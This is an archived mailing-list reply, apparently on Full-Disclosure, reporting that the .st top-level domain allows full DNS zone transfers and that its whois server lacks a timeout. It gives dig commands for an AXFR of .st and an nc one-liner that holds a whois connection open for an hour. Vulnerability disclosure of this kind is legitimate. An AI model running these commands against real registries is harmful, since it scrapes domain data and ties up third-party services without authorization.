lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list]
Message-ID: <BAY19-F374548E4F26F940063B15194AF0@phx.gbl>
From: troubles___ at hotmail.com (Troubles Troubles)
Subject: Re: zone transfers, a spammer's dream?

== the fucking bugtraq moderators don't let me post this! ==

.st has this bug too. you can transfer the whole domain. their whois server 
also doesn't have any time-out!

try this:

dig @a.root-servers.net. st. ns
dig @auth61.ns.uu.net. st. axfr
(sleep 3600; perl -e 'print "karlung-liberation-front.st\015\012";') | nc 
whois.nic.st. 43

found by
troubles

_________________________________________________________________
Hitta r?tt p? n?tet med MSN S?k http://search.msn.se/


Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ